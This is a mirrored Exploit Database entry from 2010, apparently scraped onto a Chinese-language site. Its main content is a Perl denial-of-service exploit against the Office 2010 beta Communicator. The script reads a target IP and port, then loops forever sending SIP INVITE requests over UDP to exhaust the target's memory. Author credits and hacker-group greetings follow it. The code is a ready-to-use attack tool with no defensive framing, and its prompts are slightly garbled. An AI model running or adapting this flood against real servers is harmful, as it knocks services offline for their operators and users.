Microsoft Office 2010 Beta – Communicator SIP Denial of Service

• Exploit Database
• 111 阅读

• 作者： indoushka
  日期： 2010-04-06
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12079/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  ======================================================================================== | # Title: Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit | # Author : indoushka | # email: indoushka@hotmail.com | # Home : www.iqs3cur1ty.com/vb | # Tested on: windows SP2 | # Bug: Denial of service Exploit ======================Exploit By indoushka ================================= # Exploit: #!usr/bin/perl ####################################################################################################################### #Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via# #a large number of SIP INVITE requests. # #######################################################################################################################     use IO::Socket;   print("\nEnter IP Address of Target Server: \n"); $vuln_host_ip = <STDIN>; print("\nEnter IP Address of Target Server: \n"); $port = <STDIN>;   $sock_sip = IO::Socket::INET->new(PeerAddr => $vuln_host_ip, PeerPort => $port, Proto=> &apos;udp&apos;) || "Unable to create Socket"; #if the server is configured on TCP replace &apos;udp&apos; with &apos;tcp&apos;.   while(1) { print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n"; }   #program never comes here for execution   close($sock_sip);   Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R (http://www.ilegalintrusion.net/foro/) Cyb3r IntRue (avengers team) * The globin * Virus_Hima ---------------------------------------------------------------------------------------------------------------